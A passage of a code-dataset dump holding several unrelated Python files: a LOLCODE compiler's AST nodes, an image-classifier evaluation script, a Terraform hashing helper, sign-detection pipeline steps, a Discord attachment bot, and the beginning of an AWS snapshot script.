print_entry(entry, compiled_code):\n if entry.expr_type in {PrimitiveType.NUMBAR, PrimitiveType.NUMBR, PrimitiveType.TROOF}:\n compiled_code.append(['OUT_NUM', entry])\n elif entry.expr_type == PrimitiveType.LETTR:\n compiled_code.append(['OUT_CHAR', entry])\n elif entry.expr_type == 'LETTRS' or entry.expr_type == PrimitiveType.LETTRS or entry.expr_type == PrimitiveType.YARN:\n start_label = symbol_table.get_unique_label(root='visible_array_loop_start')\n end_label = symbol_table.get_unique_label(root='visible_array_loop_end')\n result = symbol_table.get_entry('NUMBR')\n check = symbol_table.get_entry('NUMBR')\n jresult = symbol_table.get_entry('NUMBR')\n out = symbol_table.get_entry('NUMBR')\n compiled_code.append(['AR_GET_SIZE', entry, result])\n compiled_code.append(['VAL_COPY', 0, check])\n compiled_code.append([f'{start_label}:'])\n compiled_code.append(['TEST_GTE', check, result, jresult])\n compiled_code.append(['JUMP_IF_N0', jresult, end_label])\n compiled_code.append(['AR_GET_IDX', entry, check, out])\n compiled_code.append(['OUT_CHAR', out])\n compiled_code.append(['ADD', 1, check, check])\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([f'{end_label}:'])\n else:\n start_label = symbol_table.get_unique_label(root='visible_array_loop_start')\n end_label = symbol_table.get_unique_label(root='visible_array_loop_end')\n result = symbol_table.get_entry('NUMBR')\n check = symbol_table.get_entry('NUMBR')\n jresult = symbol_table.get_entry('NUMBR')\n out = symbol_table.get_entry('NUMBR')\n compiled_code.append(['AR_GET_SIZE', entry, result])\n compiled_code.append(['VAL_COPY', 0, check])\n compiled_code.append([f'{start_label}:'])\n compiled_code.append(['TEST_GTE', check, result, jresult])\n compiled_code.append(['JUMP_IF_N0', jresult, end_label])\n compiled_code.append(['AR_GET_IDX', entry, check, out])\n compiled_code.append(['OUT_NUM', out])\n compiled_code.append(['ADD', 1, check, check])\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([f'{end_label}:'])\n\n for child in self.children:\n child_entry = child.compile(symbol_table, compiled_code)\n print_entry(child_entry, compiled_code)\n\n if self.output_newline:\n compiled_code.append(['OUT_CHAR', r\"'\\n'\"])\n \nclass ArrayDeclaration(ASTNode):\n \"\"\"\n Declaration of array objects\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name, declaration_type, expression = self.children\n array_entry = symbol_table.declare_array(name, declaration_type)\n num_entry = expression.compile(symbol_table, compiled_code)\n compiled_code.append([\"AR_SET_SIZE\", array_entry, num_entry])\n return array_entry\n \nclass ArrayIndex(ASTNode):\n \"\"\"\n Index array objects\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n array, index = self.children\n array_entry = array.compile(symbol_table, compiled_code)\n index_entry = index.compile(symbol_table, compiled_code)\n if index_entry.expr_type != PrimitiveType.NUMBR or array_entry.address_type != 'a':\n raise IndexTypeError(f\"Can't index on type {index_entry.expr_type}\")\n type_check = array_entry.expr_type.name\n if type_check == 'NUMBRS':\n primtype = PrimitiveType.NUMBR\n elif type_check == 'LETTRS' or type_check == 'YARN':\n primtype = PrimitiveType.LETTR\n else:\n primtype = PrimitiveType.TROOF\n result = symbol_table.get_entry(primtype)\n compiled_code.append(['AR_GET_IDX', array_entry, index_entry, result])\n return result\n\nclass LengthzExpression(ASTNode):\n \"\"\"\n Expression for returning array length\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n var = self.children[0]\n var_entry = var.compile(symbol_table, compiled_code)\n if var_entry.address_type == 's':\n raise CompilerTypeError(\"Can't find length of a non-array type\")\n result = symbol_table.get_entry(PrimitiveType.NUMBR)\n compiled_code.append(['AR_GET_SIZE', var_entry, result])\n return result\n \nclass VariableDeclaration(ASTNode):\n \"\"\"\n An expression that represents a varible identifier (like x).\n The string of the variable's name and its type are its children.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name, declaration_type = self.children\n return symbol_table.declare_variable(name, declaration_type)\n\nclass VariableUse(ASTNode):\n \"\"\"\n An expression that represents a varible identifier (like x).\n The string of the variable's name is stored as its only child.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n name = self.children[0]\n return symbol_table.get_entry_for_variable(name)\n\nclass MathBinaryExpression(ASTNode):\n \"\"\"\n An expression that represents a math binary operation \n (like 'SUM OF josh AN 6'). The children consist of\n the operator as a string (like 'SUM'), the first operand,\n and the second operand.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr_1, expr_2 = self.children\n entry_1 = expr_1.compile(symbol_table, compiled_code)\n entry_2 = expr_2.compile(symbol_table, compiled_code)\n\n numeric_types = {PrimitiveType.NUMBR, PrimitiveType.NUMBAR}\n if entry_1.expr_type not in numeric_types:\n raise CompilerTypeError(f'{expr_1} is not a numeric type.')\n if entry_2.expr_type not in numeric_types:\n raise CompilerTypeError(f'{expr_1} is not a numeric type.')\n if entry_1.expr_type != entry_2.expr_type:\n raise CompilerTypeError(f'{expr_1} and {expr_2} do not match types.')\n\n result_entry = symbol_table.get_entry(expr_type=entry_1.expr_type)\n \n math_lol_to_lmao = {\n 'SUM': 'ADD',\n 'DIFF': 'SUB',\n 'PRODUKT': 'MULT',\n 'QUOSHUNT': 'DIV',\n }\n lmao_command = math_lol_to_lmao[operator]\n compiled_code.append([lmao_command, entry_1, entry_2, result_entry])\n\n\n return result_entry\n\nclass MathUnaryExpression(ASTNode):\n \"\"\"\n An expression that represents a math unary operation \n (like 'FLIP OF 6'). The children consist of\n the operator as a string (like 'FLIP') and the operand.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr = self.children\n entry = expr.compile(symbol_table, compiled_code)\n\n numeric_types = {PrimitiveType.NUMBR, PrimitiveType.NUMBAR}\n if entry.expr_type not in numeric_types:\n raise CompilerTypeError(f'{entry} is not a numeric type.')\n\n result_entry = symbol_table.get_entry(expr_type=entry.expr_type)\n \n if operator == 'FLIP':\n compiled_code.append(['DIV', 1, entry, result_entry])\n else: # operator == 'SQUAR':\n compiled_code.append(['MULT', entry, entry, result_entry])\n return result_entry\n\n\nclass AssignmentExpression(ASTNode):\n \"\"\"\n An expression that represents an assignment (like 'toyz R \"us\"')\n or intializations (like 'I HAS A x ITZ A NUMBR AN ITZ 5').\n Its expr_type is the type of the right side of the assignment\n (YARN and NUMBR in the above examples).\n The left side (the variable expression) and the right side (the value)\n being assigned compose its two children\n \"\"\"\n def __init__(self, left_side, right_side):\n super().__init__(children=[left_side, right_side])\n \n \n def compile(self, symbol_table, compiled_code):\n yarn_lettrs = {PrimitiveType.YARN, PrimitiveType.LETTRS}\n left_side, right_side = self.children\n right_entry = right_side.compile(symbol_table, compiled_code)\n left_entry = left_side.compile(symbol_table, compiled_code)\n if left_entry.expr_type != right_entry.expr_type:\n if not (left_entry.expr_type in yarn_lettrs and right_entry.expr_type in yarn_lettrs):\n raise CompilerTypeError(f'{left_entry.expr_type} != {right_entry.expr_type}')\n if right_entry.address_type == 'a':\n compiled_code.append(['AR_COPY', right_entry, left_entry])\n else:\n if isinstance(left_side, ArrayIndex):\n var_name = left_side.children[0].children[0]\n lit_address = left_side.children[1]\n var_address = symbol_table.get_entry_for_variable(var_name)\n last_address = compiled_code[-1][2]\n compiled_code.append(['AR_SET_IDX', var_address, last_address, right_entry])\n compiled_code.append(['VAL_COPY', right_entry, left_entry])\n return left_entry\n\nclass LogicalExpressionLazy(ASTNode):\n \"\"\"\n An expression that represents a logical expression \n (like 'BOTH OF WIN AN FAIL').\n The first child is the operator, and the rest of the children\n are the TROOF expressions to be evaluated.\n Only evaluates as many operands as needed to determine result.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n def check_is_troof_and_get_entry(expr):\n entry = expr.compile(symbol_table, compiled_code)\n if entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\n f'Using non-TROOF type {entry.expr_type} in logical expression')\n return entry\n\n operator = self.children[0]\n \n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n child_exprs = self.children[1:]\n\n compiled_code.append([f'# Logical Expression (result in {result_entry})'])\n \n if operator == 'NOT':\n entry = check_is_troof_and_get_entry(child_exprs[0])\n compiled_code.append(['TEST_EQU', entry, 0, result_entry])\n elif operator in {'BOTH', 'ALL', 'EITHER', 'ANY'}:\n lazy_jump_label = symbol_table.get_unique_label(root='logical_lazy_jump')\n for expr in child_exprs:\n entry = check_is_troof_and_get_entry(expr)\n command = 'JUMP_IF_0' if operator in {'BOTH', 'ALL'} else 'JUMP_IF_N0'\n compiled_code.append([command, entry, lazy_jump_label])\n compiled_code.append(['VAL_COPY', entry, result_entry])\n\n end_label = symbol_table.get_unique_label(root='logical_end')\n compiled_code.append(['JUMP', end_label])\n compiled_code.append([lazy_jump_label + ':'])\n value = 0 if operator in {'BOTH', 'ALL'} else 1\n compiled_code.append(['VAL_COPY', value, result_entry])\n compiled_code.append([end_label + ':'])\n elif operator in {}:\n pass\n else: # operator == 'WON'\n entry_1 = check_is_troof_and_get_entry(child_exprs[0])\n entry_2 = check_is_troof_and_get_entry(child_exprs[1])\n compiled_code.append(['TEST_NEQU', entry_1, entry_2, result_entry])\n\n compiled_code.append([f'# Logical Expression (result in {result_entry}) Done'])\n return result_entry\n\nclass LogicalExpression(ASTNode):\n \"\"\"\n An expression that represents a logical expression \n (like 'BOTH OF WIN AN FAIL').\n The first child is the operator, and the rest of the children\n are the TROOF expressions to be evaluated.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator = self.children[0]\n entries = [expr.compile(symbol_table, compiled_code) \n for expr in self.children[1:]]\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n if operator == 'NOT':\n compiled_code.append(['TEST_EQU', entries[0], 0, result_entry])\n elif operator in {'BOTH', 'EITHER', 'WON'}:\n compiled_code.append(['ADD', entries[0], entries[1], result_entry])\n if operator == 'BOTH': \n compiled_code.append(['TEST_EQU', result_entry, 2, result_entry])\n elif operator == 'EITHER': \n compiled_code.append(['TEST_GTE', result_entry, 1, result_entry])\n else: # operator == 'WON': \n compiled_code.append(['TEST_EQU', result_entry, 1, result_entry])\n else: # operator in {'ALL', 'ANY'}:\n compiled_code.append(['VAL_COPY', 0, result_entry])\n for entry in entries:\n compiled_code.append(['ADD', entry, result_entry, result_entry])\n if operator == 'ALL':\n compiled_code.append(['TEST_EQU', len(entries), result_entry, result_entry])\n else: # operator == 'ANY'\n compiled_code.append(['TEST_GTE', result_entry, 1, result_entry])\n return result_entry\n\n\n\nclass ComparisonExpression(ASTNode):\n \"\"\"\n An expression that represents a comparison expression \n (like 'BOTH SAEM 5 AN 7').\n The first child is the operator, and the rest of the children\n are the two operands.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n operator, expr_1, expr_2 = self.children\n entry_1 = expr_1.compile(symbol_table, compiled_code)\n entry_2 = expr_2.compile(symbol_table, compiled_code)\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.TROOF)\n \n if entry_1.expr_type != entry_2.expr_type:\n compiled_code.append(['VAL_COPY', 0, result_entry])\n return result_entry\n\n lol_to_lmao = {\n 'SAEM': 'TEST_EQU',\n 'DIFFRINT': 'TEST_NEQU',\n 'FURSTSMALLR': 'TEST_LESS',\n 'FURSTBIGGR': 'TEST_GTR',\n }\n lmao_command = lol_to_lmao[operator]\n compiled_code.append([lmao_command, entry_1, entry_2, result_entry])\n return result_entry\n\n\nclass WhatevrExpression(ASTNode):\n \"\"\"\n A node representing a random NUMBR.\n \"\"\"\n def __init__(self):\n super().__init__()\n \n def compile(self, symbol_table, compiled_code):\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.NUMBR)\n compiled_code.append(['RANDOM', result_entry])\n return result_entry\n\nclass GimmehExpression(ASTNode):\n \"\"\"\n A node representing a request of a LETTR from standard input.\n \"\"\"\n def __init__(self):\n super().__init__()\n \n def compile(self, symbol_table, compiled_code):\n result_entry = symbol_table.get_entry(expr_type=PrimitiveType.LETTR)\n compiled_code.append(['IN_CHAR', result_entry])\n return result_entry\n\nclass ORLYStatement(ASTNode):\n \"\"\"\n A node representing a O RLY? statement.\n Its children are (in the following order):\n a conditional expression,\n a code block (YA RLY),\n a list (possible empty) of mebbe expresions/block pairs,\n a code block (possibly None) of NO WAI\n\n \"\"\"\n def __init__(self, children):\n super().__init__(children=children)\n \n def compile(self, symbol_table, compiled_code):\n def compile_and_check_troof(expr):\n entry = expr.compile(symbol_table, compiled_code)\n if entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\n f'{cond_entry.expr_type} is not an acceptable conditional expression')\n return entry\n\n compiled_code.append(['# Compiling O RLY Statement'])\n expr, if_true_block, otherwise_block = self.children\n \n oic_label = symbol_table.get_unique_label(root='oic')\n \n expr = compile_and_check_troof(expr)\n after_label = symbol_table.get_unique_label(root='after_if_true_block')\n compiled_code.append(['JUMP_IF_0', expr, after_label])\n if_true_block.compile(symbol_table, compiled_code)\n compiled_code.append(['JUMP', oic_label])\n compiled_code.append([after_label + ':'])\n\n\n if otherwise_block:\n otherwise_block.compile(symbol_table, compiled_code)\n\n compiled_code.append([oic_label + ':'])\n compiled_code.append(['# Done with O RLY Statement'])\n\nclass LoopStatement(ASTNode):\n \"\"\"\n A node representing a loop statement.\n Its children are (in the following order):\n a code block representing the body of the loop\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n compiled_code.append(['# Compiling Loop Statement'])\n body, expr = self.children\n\n start_label = symbol_table.get_unique_label(root='loop_start')\n end_label = symbol_table.get_unique_label(root='loop_end')\n compiled_code.append([start_label + ':'])\n if expr:\n if len(expr) > 1:\n exit_entry = expr[1].compile(symbol_table, compiled_code)\n if exit_entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\"TIL expression not TROOF\")\n compiled_code.append(['JUMP_IF_N0', exit_entry, end_label])\n if not isinstance(expr[0], AssignmentExpression):\n exit_entry = expr[0].compile(symbol_table, compiled_code)\n if exit_entry.expr_type != PrimitiveType.TROOF:\n raise CompilerTypeError(\"TIL expression not TROOF\")\n compiled_code.append(['JUMP_IF_N0', exit_entry, end_label])\n symbol_table.push_GTFO_stack(end_label)\n\n body.compile(symbol_table, compiled_code)\n if expr:\n if isinstance(expr[0], AssignmentExpression):\n expr[0].compile(symbol_table, compiled_code)\n\n compiled_code.append(['JUMP', start_label])\n compiled_code.append([end_label + ':'])\n symbol_table.pop_GTFO_stack()\n compiled_code.append(['# Done with Loop Statement'])\n\nclass GTFOStatement(ASTNode):\n \"\"\"\n A node representing a GTFO (break) statement.\n It has no children. It relies on the Symbol Table to determine\n jump destination.\n \"\"\"\n def compile(self, symbol_table, compiled_code):\n destination = symbol_table.read_GTFO_stack()\n compiled_code.append(['JUMP', destination])","sub_path":"Project5/ast_nodes.py","file_name":"ast_nodes.py","file_ext":"py","file_size_in_byte":24167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"339038801","text":"# %%\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\nfrom keras.models import *\nimport keras\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nfrom keras.applications.imagenet_utils import preprocess_input\nimport efficientnet.keras as efn\nfrom keras.metrics import categorical_accuracy\nimport math\n\n# %%\nwith open(f'tmp/model_EfficientNet-B5-9.4.6-0.json', 'r') as f:\n model = model_from_json(f.read())\n model.load_weights(\n f'tmp/ckpt-EfficientNet-B5-9.4.6-0-Epoch_030-acc_0.99586-val_acc_0.94724.h5')\n\n# %%\n(b, w, h, c) = model.input_shape\nbatch_size = 16\n# %%\nlabels_valid = pd.read_csv('tmp/labels_valid.csv')\nlabels_valid['lb'] = labels_valid.label.apply(lambda x: f'{x:02d}')\n# %%\n# 0.8945601074546675\n\n\ndef aug_images(img_raw, img_size=(299, 299)):\n (w, h) = img_raw.size\n if h <= w:\n b = (w-h)//2\n box_center = (b, 0, h+b, h)\n box_top = (0, 0, h, h)\n box_bottom = (w-h, 0, w, h)\n else:\n b = (h-w)//2\n box_center = (0, b, w, w+b)\n box_top = (0, 0, w, w)\n box_bottom = (0, h-w, w, h)\n\n imgs = [\n img_raw.resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_center).resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_top).resize(img_size, Image.LANCZOS),\n # img_raw.crop(box_bottom).resize(img_size, Image.LANCZOS),\n ]\n # imgs_flip = [i.transpose(Image.FLIP_LEFT_RIGHT) for i in imgs]\n # imgs = imgs+imgs_flip\n imgs_new = []\n for img in imgs:\n imgs_new.append(img)\n imgs_new.append(img.transpose(Image.ROTATE_90))\n imgs_new.append(img.transpose(Image.ROTATE_180))\n imgs_new.append(img.transpose(Image.ROTATE_270))\n\n return np.array([efn.preprocess_input(np.array(x)) for x in imgs_new])\n\n\nlbs = []\nfor r in labels_valid.itertuples():\n img = Image.open('garbage_classify/train_data/' + r.fname)\n imgs = aug_images(img, (w, h))\n pred = model.predict(imgs)\n lbs.append(np.argmax(np.sum(pred, axis=0)))\n\n\nreal_labels = labels_valid.label.values\npred_labels = np.array(lbs)\npd.DataFrame(pred_labels).to_csv('tmp/preds.csv', index=False)\nacc = (real_labels == pred_labels).sum()/real_labels.shape[0]\nacc\n\n# %%\nreal_labels = pd.read_csv('tmp/labels_valid.csv').label.values\npred_labels = pd.read_csv('tmp/preds.csv').values.flatten()\n\n\n# %%\n","sub_path":"src_yml/result_analyse_v4.4.py","file_name":"result_analyse_v4.4.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120934130","text":"#!/usr/bin/env python3\n#\n# Build Lambda function with no binary dependencies\n#\nimport os\nimport glob\nimport json\nimport sys\nimport datetime\nimport contextlib\nimport hashlib\nimport base64\nfrom functools import wraps\nfrom past.builtins import basestring\n\n# -- helpers --\n\n# vendored in from: https://github.com/operatingops/terraform_external_data\n\ndef error(message):\n \"\"\"\n Errors must create non-zero status codes and human-readable, ideally one-line, messages on stderr.\n \"\"\"\n print(message, file=sys.stderr)\n sys.exit(1)\n\n\ndef validate(data):\n \"\"\"\n Query data and result data must have keys who's values are strings.\n \"\"\"\n if not isinstance(data, dict):\n error('Data must be a dictionary.')\n for value in data.values():\n if not isinstance(value, basestring):\n error('Values must be strings.')\n\n\ndef terraform_external_data(function):\n \"\"\"\n Query data is received on stdin as a JSON object.\n Result data must be returned on stdout as a JSON object.\n The wrapped function must expect its first positional argument to be a dictionary of the query data.\n \"\"\"\n @wraps(function)\n def wrapper(*args, **kwargs):\n query = json.loads(sys.stdin.read())\n validate(query)\n try:\n result = function(query, *args, **kwargs)\n except Exception as e:\n # Terraform wants one-line errors so we catch all exceptions and trim down to just the message (no trace).\n error('{}: {}'.format(type(e).__name__, e))\n validate(result)\n sys.stdout.write(json.dumps(result))\n return wrapper\n\n# -- assorted helpers --\n\n@contextlib.contextmanager\ndef cd(path):\n old_dir = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(old_dir)\n\ndef hash_file(file_path, digest=None):\n if digest is None:\n digest = hashlib.sha1()\n\n if os.path.isfile(file_path):\n with open(file_path, 'rb') as f_obj:\n while True:\n buf = f_obj.read(1024 * 1024)\n if not buf:\n break\n digest.update(buf)\n else:\n raise FileNotFoundError\n\n return digest.hexdigest()\n\ndef hash_directory(path):\n digest = hashlib.sha1()\n\n if not os.path.exists(path):\n raise FileNotFoundError\n\n for root, dirs, files in sorted(os.walk(path)):\n for names in files:\n\n # ignore .git, .gitkeep and requirements.txt\n if root.find(\"/.git\") != -1:\n continue\n if names in [\".gitkeep\", \"requirements.txt\"]:\n continue\n\n file_path = os.path.join(root, names)\n digest.update(hashlib.sha1(file_path[len(path):].encode()).digest())\n hash_file(file_path, digest)\n\n return digest.hexdigest()\n\ndef find_old_identifier(output_glob_filepath):\n glob_found = glob.glob(output_glob_filepath)\n return glob_found[0] if len(glob_found) == 1 else None\n\n# -- main --\n\n@terraform_external_data\ndef main(query):\n with contextlib.suppress(FileNotFoundError):\n query['project_path_hash'] = hash_directory(query['project_path'])\n\n with contextlib.suppress(FileNotFoundError):\n query['lib_path_hash'] = hash_directory(query['lib_path'])\n\n with contextlib.suppress(FileNotFoundError):\n query['requirements_file_hash'] = hash_file(query['requirements_file'])\n\n sha1 = hashlib.sha1(json.dumps(query).encode())\n function_name = query[\"name\"]\n\n # determine if the resulting zipfile already exists with the right content:\n output_path = query[\"output_path\"]\n output_filepattern = \"{}_{{}}.zip\".format(function_name)\n output_glob_filepath = \"{}/{}\".format(output_path, output_filepattern.format(\"*\"))\n\n # Search for a file with an existing identifier\n output_zipfile_path = find_old_identifier(output_glob_filepath)\n if not output_zipfile_path:\n # If file wasn't found, return new identifier based on timestamp\n identifier_base = \"{}{}\".format(datetime.datetime.now().isoformat(), function_name)\n identifier_sha = hashlib.sha1(identifier_base.encode())\n identifier = base64.urlsafe_b64encode(identifier_sha.digest()).decode()[:16]\n output_zipfile_path = \"{}/{}\".format(output_path, output_filepattern.format(identifier))\n\n return {'sha': sha1.hexdigest(),\n 'output_filepath': output_zipfile_path,\n 'isodate': datetime.datetime.now().isoformat()}\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/needs_rebuild.py","file_name":"needs_rebuild.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293392780","text":"from typing import Dict\n\nimport cv2\nimport numpy as np\nfrom PIL import ImageDraw, ImageFont, Image\nfrom sklearn.preprocessing import LabelEncoder\n\nimport common\nfrom box_extractors import Extractor\nfrom classifier import common_class_merger\nfrom model import Model\nfrom pipeline import Step\n\n\nclass Input(Step):\n def __init__(self, name: str):\n super().__init__(name)\n\n def perform(self, data: Dict):\n return {\n \"input_frame\": data[list(data.keys())[0]]\n }\n\n\nclass DetectingSingleFrameStep(Step):\n def __init__(self, name: str, model: Model, extractor: Extractor):\n super().__init__(name)\n self.model = model\n self.extractor = extractor\n self.required_keys = [\"input_frame\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_frame = data[\"input_frame\"]\n expanded_input_frame = np.expand_dims(input_frame, axis=0)\n detected_boxes = self.model.predict(expanded_input_frame)\n detected_boxes = np.squeeze(detected_boxes, axis=0)\n output_frames = self.extractor.extract(input_frame, detected_boxes)\n return {\n \"boxes\": output_frames,\n \"boxes_coordinates\": detected_boxes\n }\n\n\nclass ClassifyingBoxesStep(Step):\n def __init__(self, name: str, model: Model, input_width: int, input_height: int):\n super().__init__(name)\n self.model = model\n self.input_width = input_width\n self.input_height = input_height\n self.required_keys = [\"boxes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_data = data[\"boxes\"]\n preprocessed_boxes = []\n classes = []\n probas = []\n for box in input_data:\n box = cv2.resize(box, (self.input_width, self.input_height))\n box = cv2.cvtColor(cv2.cvtColor(box, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)\n preprocessed_boxes.append(box)\n if len(preprocessed_boxes) > 0:\n preprocessed_boxes = np.asarray(preprocessed_boxes, dtype=np.float32)\n classes, probas = self.model.predict(preprocessed_boxes)\n return {\n \"predicted_classes\": classes,\n \"predicted_probabilities\": probas\n }\n\n\nclass DecodeClassesStep(Step):\n\n def __init__(self, name: str, label_encoder: LabelEncoder):\n super().__init__(name)\n self.le = label_encoder\n self.required_keys = [\"predicted_classes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_data = data[\"predicted_classes\"]\n classes_names = self.le.inverse_transform(input_data)\n classes_names = common_class_merger.merge(classes_names)\n return {\n \"classes_names\": classes_names\n }\n\n\nclass VisualiseStep(Step):\n def __init__(self, name: str):\n super().__init__(name)\n self.required_keys = [\"input_frame\", \"boxes\", \"predicted_classes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_frame = data[\"input_frame\"]\n boxes = data[\"boxes_coordinates\"]\n predicted_classes = data[\"classes_names\"]\n image = Image.fromarray(input_frame)\n if len(boxes) > 0:\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(font=common.FONT_PATH.as_posix(),\n size=np.floor(3e-2 * image.size[1] + 0.5).astype(np.int32))\n thickness = (image.size[0] + image.size[1]) // 500 # do day cua BB\n for (left, top, right, bottom), cls in zip(boxes, predicted_classes):\n\n label_size = draw.textsize(cls, font)\n if top - label_size[1] >= 0:\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n # My kingdom for a good redistributable image drawing library.\n color = (0, 255, 0) if cls != common.NO_SIGN_CLASS else (2, 106, 253)\n for j in range(thickness):\n draw.rectangle([left + j, top + j, right - j, bottom - j], outline=color)\n draw.rectangle([tuple(text_origin), tuple(text_origin + label_size)], fill=color)\n draw.text(text_origin, cls, fill=(0, 0, 0), font=font)\n\n return {\n \"visualised\": np.asarray(image)\n }\n\n\nclass ShowVisualisation(Step):\n def __init__(self, name: str):\n super().__init__(name)\n self.required_keys = [\"visualised\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n visualised = data[\"visualised\"]\n cv2.imshow('frame', visualised)\n return {}\n","sub_path":"src/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352255897","text":"import re\nimport os\n\nfrom discord import channel\n\nfrom disco import bot, constants, utils\n\n\n@bot.listen()\nasync def on_message(message):\n if message.author == bot.user:\n return\n\n if isinstance(message.channel, channel.PrivateChannel):\n if not message.attachments:\n match = re.match(constants.RE_ATTACHMENT_URI, message.content)\n if match is not None:\n owner_name = match.group(1)\n filename = match.group(2)\n\n path = os.path.join('attachments', owner_name, filename)\n if message.author.name == owner_name and os.path.exists(path):\n await bot.send_message(\n message.channel, 'Deleting %s...' % filename)\n os.remove(path)\n dirname = os.path.dirname(path)\n if not os.listdir(dirname):\n os.rmdir(dirname)\n return\n\n uris = []\n path = os.path.join('attachments', message.author.name)\n if os.path.exists(path):\n for filename in os.listdir(path):\n uri = utils.make_attachment_uri(\n message.author.name, filename)\n uris.append(uri)\n quote = 'That attachment does not exist!\\n\\nIf you wish to ' \\\n 'delete one of your submitted attachments, you must ' \\\n 'provide its URI. '\n if uris:\n quote += 'Here is a list of all of your submitted ' \\\n 'attachments:\\n' + '\\n'.join(uris)\n else:\n quote += 'You currently have no submitted attachments.'\n await bot.send_message(message.channel, quote)\n return\n\n for attachment in message.attachments:\n filename = attachment['filename']\n\n ext = os.path.splitext(filename)[1]\n if ext not in constants.VALID_ATTACHMENT_TYPES:\n await bot.send_message(\n message.channel,\n 'File type %s is not supported! It must be one of the '\n 'following: %s' %\n (ext, ', '.join(constants.VALID_ATTACHMENT_TYPES)))\n continue\n\n await bot.send_message(\n message.channel, 'Downloading %s...' % filename)\n uri = await bot.download_attachment(message.author, attachment)\n await bot.send_message(\n message.channel,\n 'Done! To play this attachment, use: %s play %s' %\n (bot.user.mention, uri))\n","sub_path":"disco/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"384527145","text":"#!/usr/bin/env python3.5\n\"\"\"\n\nTag your instance and/or volumes with:\n Snapshot: yes|Yes\n\nYou can also pass instance ID or snapshot ALL (default).\n\nIt uses boto just like ansible, and you don't need to specify\ncredentials. You can use multiple boto profiles as described here:\n\nhttp://boto.cloudhackers.com/en/latest/boto_config_tut.html\n\nArguments:\n ALL arguments are optional.\n -v VERBOSE mode\n -h help\n -i \n -p , default: default\n -t , default: Snapshot\n -n <1..1000>, default: 15, number of snapshots to keep for each volume\n -l <1..1000>, default: 24, number of hours that will elapse before creating a new snapshot\n\n\nExamples:\n python snapshot_instances.py\n This will snapshot all volumes of all instances, keeping 10 snapshots\n creating a new one every day\n\n python snapshot_instances.py -i i-342abc3\n This will snapshot all volumes of i-342abc3, keeping 10 snapshots\n creating a new one every day\n\n python snapshot_instances.py -i i-342abc3,i-342abc4,i-213abc2\n This will snapshot all volumes of i-342abc3, keeping 10 snapshots\n creating a new one every day\n\n python snapshot_instances.py -p work -n 4 -l 168\n Snapshot all instances in your work profile, creating one snapshot\n per week, for 4 weeks\n\n python snapshot_instances.py -v\n Same as the first example, printing status as it goes.\n\"\"\"\n\nimport sys\nfrom datetime import timedelta\nimport datetime\nimport getopt\nimport boto\nimport boto.ec2\nimport dateutil.parser\nfrom dateutil import tz\n\nBOTO_PROFILE = ''\nNUMBER_SNAPSHOTS = 15\nLIFETIME = 24\nTAG = 'Snapshot'\n# LIFETIME is the number of hours minimum to create a new snapshot\n# defaults to 1 per day\n\nINSTANCE_IDS = ''\nAWS_CONN = None\nVERBOSE = False\n\nCHECKED_VOLUMES = list()\n\n\ndef parse_args(argv):\n \"\"\"\n Basic arg parsing\n \"\"\"\n\n global BOTO_PROFILE, NUMBER_SNAPSHOTS, LIFETIME, INSTANCE_IDS, VERBOSE, TAG\n try:\n opts, _ = getopt.getopt(argv, \"t:p:n:l:i:vh\")\n except getopt.GetoptError:\n print(\"Error parsing options\")\n help()\n sys.exit(1)\n\n for opt, arg in opts:\n if opt == '-p':\n BOTO_PROFILE = arg\n elif opt == '-t':\n TAG = arg\n elif opt == '-h':\n help()\n sys.exit(0)\n elif opt == '-v':\n VERBOSE = True\n elif opt == '-n':\n try:\n NUMBER_SNAPSHOTS = int(arg)\n if NUMBER_SNAPSHOTS < 1 or NUMBER_SNAPSHOTS > 1000:\n NUMBER_SNAPSHOTS = 10\n raise ValueError(\"Incorrect number of snapshots\")\n 